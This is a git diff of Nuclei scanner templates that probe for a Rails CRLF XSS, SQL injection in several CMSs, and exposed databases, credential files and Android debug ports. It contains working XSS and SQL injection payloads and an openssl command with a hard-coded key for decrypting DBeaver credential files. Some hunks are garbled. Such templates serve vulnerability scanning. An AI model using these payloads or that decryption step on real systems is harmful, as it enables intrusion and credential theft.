-# Nuclei has issues with 302 response missing a Location header thus the -# extended payload to make Nuclei work. -# Working poc by @Mad-robot -# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 info: name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) author: ooooooo_q,rootxharsh,iamnoooob severity: medium - reference: - - https://hackerone.com/reports/904059 + reference: https://hackerone.com/reports/904059 tags: rails,xss,crlf + + # XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); + # Nuclei has issues with 302 response missing a Location header thus the + # extended payload to make Nuclei work. + # Working poc by @Mad-robot + # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 + requests: - method: POST path: - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa" + matchers-condition: and matchers: - type: word diff --git a/poc/samba/samba-config-9987.yaml b/poc/samba/samba-config-9987.yaml index b62e399c6a..15e05034c0 100644 --- a/poc/samba/samba-config-9987.yaml +++ b/poc/samba/samba-config-9987.yaml @@ -1,13 +1,16 @@ id: samba-config + info: name: Samba config file disclosure author: sheikhrishad severity: info tags: config,exposure,smb,samba + requests: - method: GET path: - "{{BaseURL}}/smb.conf" + matchers-condition: and matchers: - type: word @@ -15,6 +18,7 @@ requests: - "configuration file" - "samba" condition: and + - type: status status: - 200 diff --git a/poc/samba/samba-detect-9988.yaml b/poc/samba/samba-detect-9988.yaml index 1bd21fd9d7..433010b743 100644 --- a/poc/samba/samba-detect-9988.yaml +++ b/poc/samba/samba-detect-9988.yaml @@ -1,15 +1,8 @@ id: samba-detection info: - name: Samba Detection + name: samba detection author: pussycat0x severity: info - description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. - reference: - - https://www.samba.org/samba/what_is_samba.html - - https://www.samba.org/samba/history/security.html - classification: - cwe-id: CWE-200 - remediation: Always apply the latest security patch. tags: network,smb,samba network: - inputs: @@ -22,4 +15,3 @@ network: - type: word words: - "SMBr" -# Enhanced by mp on 2022/02/09 diff --git a/poc/sap/sap-hana-xsengine-panel-10037.yaml b/poc/sap/sap-hana-xsengine-panel-10037.yaml index 11aec1ad6b..fbd5d438be 100644 --- a/poc/sap/sap-hana-xsengine-panel-10037.yaml +++ b/poc/sap/sap-hana-xsengine-panel-10037.yaml @@ -1,9 +1,11 @@ id: sap-hana-xsengine-panel + info: name: SAP HANA XSEngine Admin Panel author: PR3R00T severity: info tags: panel,sap + requests: - method: GET path: diff --git a/poc/sap/sap-netweaver-detect-10044.yaml b/poc/sap/sap-netweaver-detect-10044.yaml index edbd2eaef5..9fe826a6f5 100644 --- a/poc/sap/sap-netweaver-detect-10044.yaml +++ b/poc/sap/sap-netweaver-detect-10044.yaml @@ -1,14 +1,17 @@ id: sap-netweaver-detect + info: name: SAP NetWeaver ICM Detection author: randomstr1ng - severity: info description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) + severity: info tags: sap,webserver + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 2 matchers: @@ -19,6 +22,7 @@ requests: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or + extractors: - type: kval part: header diff --git a/poc/sap/sap-redirect-10066.yaml b/poc/sap/sap-redirect-10066.yaml index 906e0b928c..6b87d06067 100644 --- a/poc/sap/sap-redirect-10066.yaml +++ b/poc/sap/sap-redirect-10066.yaml @@ -1,25 +1,19 @@ id: sap-redirect - info: name: SAP wide open redirect author: Gal Nagli severity: medium description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. tags: redirect,sap - requests: - method: GET - path: - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com" - matchers-condition: and matchers: - - type: status status: - 302 - - type: word words: - "Location: https://www.example.com" diff --git a/poc/search/elasticsearch-sql-client-detect.yaml b/poc/search/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 --- a/poc/search/elasticsearch-sql-client-detect.yaml +++ b/poc/search/elasticsearch-sql-client-detect.yaml @@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - 'Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 diff --git a/poc/search/searchbar.yaml b/poc/search/searchbar.yaml index 3a8c512bf2..8cec0f7063 100644 --- a/poc/search/searchbar.yaml +++ b/poc/search/searchbar.yaml @@ -2,7 +2,7 @@ id: search-field info: name: Search Field Detection Template - author: nithissh + author: foulenzer severity: info description: Searches Response body for input-tag and id= or name= tags: search,input @@ -39,4 +39,4 @@ requests: - type: word words: - - 'nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23' + matchers: - type: word part: body diff --git a/poc/sql/Arcms-json_newslist-sqli.yaml b/poc/sql/Arcms-json_newslist-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/sql/BlueCMS_v1-adjs-sqli.yaml b/poc/sql/BlueCMS_v1-adjs-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/sql/GLPI-9.3.3-SQL-Injection.yaml b/poc/sql/GLPI-9.3.3-SQL-Injection.yaml index e7c97f72d9..98a2a439f1 100644 --- a/poc/sql/GLPI-9.3.3-SQL-Injection.yaml +++ b/poc/sql/GLPI-9.3.3-SQL-Injection.yaml @@ -1,30 +1,25 @@ ---- -id: GLPI_SQL_Injection - -info: - author: RedTeamBrasil - description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." - name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" - reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" - severity: high - tags: "glpi,cve,sqli" - -requests: - - - matchers: - - - part: body - type: word - words: - - "-MariaDB-" - max-redirects: 3 - method: GET - path: - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - redirects: true - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" \ No newline at end of file +id: GLPI_SQL_Injection +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." + name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" +requests: + - matchers: + - part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/poc/sql/Maticsoft-Shop-sqli.yaml b/poc/sql/Maticsoft-Shop-sqli.yaml index 4a87f191a9..06e83a6789 100644 --- a/poc/sql/Maticsoft-Shop-sqli.yaml +++ b/poc/sql/Maticsoft-Shop-sqli.yaml @@ -1,16 +1,13 @@ id: Maticsoft-Shop-sqli - info: name: Maticsoft-Shop商城CategoryId参数SQL注入 author: Str1am severity: high tags: Maticsoft,sqli - requests: - method: GET path: - "{{BaseURL}}/NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20AND%201=@@version" - matchers-condition: and matchers: - type: word diff --git a/poc/sql/api-abuseipdb.yaml b/poc/sql/api-abuseipdb.yaml index 077084fa93..ca83d86700 100644 --- a/poc/sql/api-abuseipdb.yaml +++ b/poc/sql/api-abuseipdb.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://docs.abuseipdb.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md tags: token-spray,abuseipdb self-contained: true diff --git a/poc/sql/couchdb-exposure-1239.yaml b/poc/sql/couchdb-exposure-1239.yaml index 83e4c2e185..376f2370b6 100644 --- a/poc/sql/couchdb-exposure-1239.yaml +++ b/poc/sql/couchdb-exposure-1239.yaml @@ -3,13 +3,14 @@ info: name: couchdb exposure author: organiccrap severity: low - tags: panel,couchdb + tags: panel requests: - method: GET path: - '{{BaseURL}}/_all_dbs' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word diff --git a/poc/sql/database-error-6771.yaml b/poc/sql/database-error-6771.yaml index ebdcaa6c55..7dce3ae9f0 100644 --- a/poc/sql/database-error-6771.yaml +++ b/poc/sql/database-error-6771.yaml @@ -3,8 +3,7 @@ info: name: Database Error author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"Database Error" + reference: https://www.shodan.io/search?query=http.title%3A%22Database+Error%22 tags: misconfig,database requests: - method: GET diff --git a/poc/sql/db-schema.yaml b/poc/sql/db-schema.yaml index 9683a57871..116072e8c2 100644 --- a/poc/sql/db-schema.yaml +++ b/poc/sql/db-schema.yaml @@ -2,10 +2,9 @@ id: db-schema info: name: Discover db schema files + description: This file is auto-generated from the current state of the database. author: geeknik severity: info - description: This file is auto-generated from the current state of the database. - tags: exposure,backup requests: - method: GET @@ -16,20 +15,22 @@ requests: matchers-condition: and matchers: - - type: word words: - "This file is auto-generated from the current state of the database." - "ActiveRecord::Schema.define" condition: and - + - type: word + part: header + words: + - "text/html" + negative: true - type: status status: - 200 - extractors: - type: regex name: version part: body regex: - - 'eRecord::Schema\.define\(version: ([0-9_]+)\) do' + - 'version: \d{14}' diff --git a/poc/sql/dbeaver-credentials.yaml b/poc/sql/dbeaver-credentials.yaml index 28f5ad1e84..e9e66f7357 100644 --- a/poc/sql/dbeaver-credentials.yaml +++ b/poc/sql/dbeaver-credentials.yaml @@ -1,28 +1,26 @@ id: dbeaver-credentials + info: name: DBeaver Credential Exposure author: geeknik - severity: high - tags: exposure,dbeaver + severity: info + requests: - method: GET path: - "{{BaseURL}}/.dbeaver/credentials-config.json" - # To decode the credentials file, use following command: + # to decode the above file, run this: # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null + matchers-condition: and matchers: - type: status status: - 200 - type: word - part: header words: - "application/octet-stream" + part: header - type: dsl dsl: - - 'len(body) > 2' - - type: dsl - dsl: - - "!contains(tolower(body), '=200 && len(body) <400" diff --git a/poc/sql/elasticsearch-sql-client-detect.yaml b/poc/sql/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 --- a/poc/sql/elasticsearch-sql-client-detect.yaml +++ b/poc/sql/elasticsearch-sql-client-detect.yaml @@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - 'Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 diff --git a/poc/sql/exposed-adb-7280.yaml b/poc/sql/exposed-adb-7280.yaml index e0a43b6ba2..26f932d53d 100644 --- a/poc/sql/exposed-adb-7280.yaml +++ b/poc/sql/exposed-adb-7280.yaml @@ -1,22 +1,33 @@ id: expsoed-adb + info: name: Exposed Android Debug Bridge author: pdteam,pikpikcu severity: critical + description: An exposed Android debug bridge was discovered. + reference: + - https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20 + - https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge + - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/ tags: network,adb,rce,android - reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge + network: - inputs: - - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint + - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint type: hex + - data: "686f73743a3a66656174757265733d7368656c6c5f76322c636d642c737461745f76322c6c735f76322c66697865645f707573685f6d6b6469722c617065782c6162622c66697865645f707573685f73796d6c696e6b5f74696d657374616d702c6162625f657865632c72656d6f756e745f7368656c6c2c747261636b5f6170702c73656e64726563765f76322c73656e64726563765f76325f62726f746c692c73656e64726563765f76325f6c7a342c73656e64726563765f76325f7a7374642c73656e64726563765f76325f6472795f72756e5f73656e642c6f70656e73637265656e5f6d646e73" type: hex + host: - "{{Hostname}}" - "{{Host}}:5555" + matchers: - type: word words: - "device" - "product" condition: and + +# Enhanced by mp on 2022/03/21 diff --git a/poc/sql/exposed-sqlite-manager-7350.yaml b/poc/sql/exposed-sqlite-manager-7350.yaml index a76ba9d93d..cff80e3ad5 100644 --- a/poc/sql/exposed-sqlite-manager-7350.yaml +++ b/poc/sql/exposed-sqlite-manager-7350.yaml @@ -1,18 +1,15 @@ id: exposed-sqlite-manager - info: name: SQLiteManager author: dhiyaneshDK severity: medium reference: https://www.exploit-db.com/ghdb/5003 tags: sqlite - requests: - method: GET path: - '{{BaseURL}}/sqlite/' - '{{BaseURL}}/sqlitemanager/' - matchers-condition: and matchers: - type: word diff --git a/poc/sql/grails-database-admin-console-7822.yaml b/poc/sql/grails-database-admin-console-7822.yaml index d2aaaaddb9..f2ed34b32f 100644 --- a/poc/sql/grails-database-admin-console-7822.yaml +++ b/poc/sql/grails-database-admin-console-7822.yaml @@ -13,13 +13,7 @@ requests: - '{{BaseURL}}/dbconsole/' - '{{BaseURL}}/h2-console/' - matchers-condition: and matchers: - type: word words: - "H2 Console" - - - type: word - words: - - "Sorry, remote connections ('webAllowOthers') are disabled on this server" - negative: true diff --git a/poc/sql/mongodb-ops-manager-8922.yaml b/poc/sql/mongodb-ops-manager-8922.yaml index 83b2f801c5..17f1155c95 100644 --- a/poc/sql/mongodb-ops-manager-8922.yaml +++ b/poc/sql/mongodb-ops-manager-8922.yaml @@ -1,17 +1,15 @@ id: mongodb-ops-manager - info: name: MongoDB Ops Manager author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22MongoDB+Ops+Manager%22 tags: panel,mongodb - requests: - method: GET path: - '{{BaseURL}}/account/login' - matchers-condition: and matchers: - type: word diff --git a/poc/sql/mongodb-unauth-8926.yaml b/poc/sql/mongodb-unauth-8926.yaml index 385b2f7ca3..469fd95eb9 100644 --- a/poc/sql/mongodb-unauth-8926.yaml +++ b/poc/sql/mongodb-unauth-8926.yaml @@ -3,11 +3,7 @@ info: name: Unauth MongoDB Disclosure author: pdteam severity: high - reference: - - https://github.com/orleven/Tentacle - - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb - - https://www.mongodb.com/features/mongodb-authentication - remediation: Enable Authentication in MongoDB + reference: https://github.com/orleven/Tentacle tags: network,mongodb,unauth network: - inputs: diff --git a/poc/sql/odoo-database-manager.yaml b/poc/sql/odoo-database-manager.yaml index 65c23b363a..3031253bbe 100644 --- a/poc/sql/odoo-database-manager.yaml +++ b/poc/sql/odoo-database-manager.yaml @@ -1,14 +1,16 @@ id: odoo-database-manager + info: - name: Odoo - Database Manager Discovery + name: Odoo-Database-Manager author: __Fazal,R3dg33k severity: high - description: Odoo database manager was discovered. tags: panel,odoo + requests: - method: GET path: - '{{BaseURL}}/web/database/manager' + matchers-condition: and matchers: - type: status @@ -19,5 +21,3 @@ requests: - "Odoo" - "{ action: 'database_manager' }" condition: and - -# Enhanced by mp on 2022/07/15 diff --git a/poc/sql/oracle-dbcs-9355.yaml b/poc/sql/oracle-dbcs-9355.yaml index 4dd45891c6..29a3ed7ae9 100644 --- a/poc/sql/oracle-dbcs-9355.yaml +++ b/poc/sql/oracle-dbcs-9355.yaml @@ -1,23 +1,20 @@ -id: oracle-dbcs -info: - name: Oracle Database as a Service - author: pussycat0x - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 - tags: oracle,tech - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Oracle Database as a Service' - part: body - - - type: status - status: - - 200 +id: oracle-dbcs +info: + name: Oracle Database as a Service + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 + tags: oracle,tech +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle Database as a Service' + part: body + - type: status + status: + - 200 diff --git a/poc/sql/sql-dump-10497.yaml b/poc/sql/sql-dump-10497.yaml index 05e97713ac..0bf0d2bcb0 100644 --- a/poc/sql/sql-dump-10497.yaml +++ b/poc/sql/sql-dump-10497.yaml @@ -1,9 +1,11 @@ id: default-sql-dump + info: name: MySQL Dump Files - author: geeknik & @dwisiswant0 + author: geeknik,dwisiswant0 severity: medium - tags: exposure,backup + tags: exposure,backup,mysql + requests: - method: GET path: @@ -28,6 +30,7 @@ requests: - "{{BaseURL}}/wp-content/uploads/dump.sql" headers: Range: "bytes=0-3000" + max-size: 2000 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: @@ -35,6 +38,7 @@ requests: regex: - "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO" part: body + - type: status status: - 200 diff --git a/poc/sql/sqliheader.yaml b/poc/sql/sqliheader.yaml index 832a9fc156..012bac2af3 100644 --- a/poc/sql/sqliheader.yaml +++ b/poc/sql/sqliheader.yaml @@ -1,8 +1,10 @@ id: header-sqli + info: name: Request header based sqli - author: panch0r3d + author: nithissh severity: high + requests: - method: GET path: diff --git a/poc/sql/thumbs-db-disclosure-10763.yaml b/poc/sql/thumbs-db-disclosure-10763.yaml index b5ee7b65d9..728de9d555 100644 --- a/poc/sql/thumbs-db-disclosure-10763.yaml +++ b/poc/sql/thumbs-db-disclosure-10763.yaml @@ -1,12 +1,11 @@ id: thumbs-db-disclosure - info: name: Thumbs DB Disclosure author: dhiyaneshDk severity: info - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json tags: exposure,files - requests: - method: GET path: @@ -17,7 +16,6 @@ requests: binary: - 'D0CF11E0A1B11AE1' part: body - - type: status status: - 200 diff --git a/poc/sql/weiphp-sql-injection.yaml b/poc/sql/weiphp-sql-injection.yaml index 8b0c9a5a1a..2b57dda7f7 100644 --- a/poc/sql/weiphp-sql-injection.yaml +++ b/poc/sql/weiphp-sql-injection.yaml @@ -1,24 +1,28 @@ id: weiphp-sql-injection + info: name: WeiPHP 5.0 SQLI author: pikpikcu severity: high - reference: - - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md - metadata: - verified: true - shodan-query: http.html:"WeiPHP5.0" + reference: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md tags: weiphp,sql + requests: - method: POST path: - "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ " + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word - part: body words: - "52c69e3a57331081823331c4e69d3f2" + part: body + condition: and + - type: status status: - 500 diff --git a/poc/sql/wordpress-db-repair-11254.yaml b/poc/sql/wordpress-db-repair-11254.yaml index 3b9b5fb05f..7c9d635e19 100644 --- a/poc/sql/wordpress-db-repair-11254.yaml +++ b/poc/sql/wordpress-db-repair-11254.yaml @@ -1,20 +1,24 @@ id: wordpress-db-repair + info: name: Wordpress DB Repair Exposed author: _C0wb0y_ severity: low description: Discover enabled Wordpress repair page. tags: wordpress,config,fpd + requests: - method: GET path: - "{{BaseURL}}/wp-admin/maint/repair.php" + matchers-condition: and matchers: - type: word words: - "WordPress" + - type: word words: - "define('WP_ALLOW_REPAIR', true);" - negative: true + negative: true \ No newline at end of file diff --git a/poc/sql/wordpress-tmm-db-migrate-11317.yaml b/poc/sql/wordpress-tmm-db-migrate-11317.yaml index d33b95d124..8e6ffbf93e 100644 --- a/poc/sql/wordpress-tmm-db-migrate-11317.yaml +++ b/poc/sql/wordpress-tmm-db-migrate-11317.yaml @@ -3,7 +3,7 @@ info: name: WordPress ThemeMarkers DB Migration File author: dwisiswant0 severity: info - tags: wordpress,wp-plugin,backup + tags: wordpress,wp-plugin,backups requests: - method: GET path: diff --git a/poc/sql/wuzhicms-sqli-11658.yaml b/poc/sql/wuzhicms-sqli-11658.yaml index fbb326fda5..b972d9a3d9 100644 --- a/poc/sql/wuzhicms-sqli-11658.yaml +++ b/poc/sql/wuzhicms-sqli-11658.yaml @@ -5,6 +5,7 @@ info: severity: high reference: https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli + requests: - method: GET path: diff --git a/poc/sql/zcms-v3-sqli.yaml b/poc/sql/zcms-v3-sqli.yaml index a7084a23d3..ed56b88314 100644 --- a/poc/sql/zcms-v3-sqli.yaml +++ b/poc/sql/zcms-v3-sqli.yaml @@ -6,18 +6,16 @@ info: reference: - https://www.anquanke.com/post/id/183241 tags: zcms,sqli -variables: - num: "999999999" requests: - method: GET path: - - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/poc/sql_injection/74cms-sqli-8.yaml b/poc/sql_injection/74cms-sqli-8.yaml index 64afb3631a..afd5c1aac4 100644 --- a/poc/sql_injection/74cms-sqli-8.yaml +++ b/poc/sql_injection/74cms-sqli-8.yaml @@ -1,4 +1,5 @@ id: CVE-2020-22210 + info: name: 74cms - ajax_officebuilding.php SQL Injection author: ritikchaddha @@ -13,16 +14,22 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 + cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* + epss-score: 0.12933 metadata: + max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" tags: cve,cve2020,74cms,sqli + variables: num: "999999999" -requests: + +http: - method: GET path: - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23' + matchers: - type: word part: body diff --git a/poc/sql_injection/Arcms-json_newslist-sqli.yaml b/poc/sql_injection/Arcms-json_newslist-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml b/poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml b/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml index e7c97f72d9..98a2a439f1 100644 --- a/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml +++ b/poc/sql_injection/GLPI-9.3.3-SQL-Injection.yaml @@ -1,30 +1,25 @@ ---- -id: GLPI_SQL_Injection - -info: - author: RedTeamBrasil - description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." - name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" - reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" - severity: high - tags: "glpi,cve,sqli" - -requests: - - - matchers: - - - part: body - type: word - words: - - "-MariaDB-" - max-redirects: 3 - method: GET - path: - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - redirects: true - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" \ No newline at end of file +id: GLPI_SQL_Injection +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." + name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" +requests: + - matchers: + - part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/poc/sql_injection/Maticsoft-Shop-sqli.yaml b/poc/sql_injection/Maticsoft-Shop-sqli.yaml index 4a87f191a9..06e83a6789 100644 --- a/poc/sql_injection/Maticsoft-Shop-sqli.yaml +++ b/poc/sql_injection/Maticsoft-Shop-sqli.yaml @@ -1,16 +1,13 @@ id: Maticsoft-Shop-sqli - info: name: Maticsoft-Shop商城CategoryId参数SQL注入 author: Str1am severity: high tags: Maticsoft,sqli - requests: - method: GET path: - "{{BaseURL}}/NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20AND%201=@@version" - matchers-condition: and matchers: - type: word diff --git a/poc/sql_injection/elasticsearch-sql-client-detect.yaml b/poc/sql_injection/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 --- a/poc/sql_injection/elasticsearch-sql-client-detect.yaml +++ b/poc/sql_injection/elasticsearch-sql-client-detect.yaml @@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - '<title>Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 diff --git a/poc/sql_injection/exposed-sqlite-manager-7350.yaml b/poc/sql_injection/exposed-sqlite-manager-7350.yaml index a76ba9d93d..cff80e3ad5 100644 --- a/poc/sql_injection/exposed-sqlite-manager-7350.yaml +++ 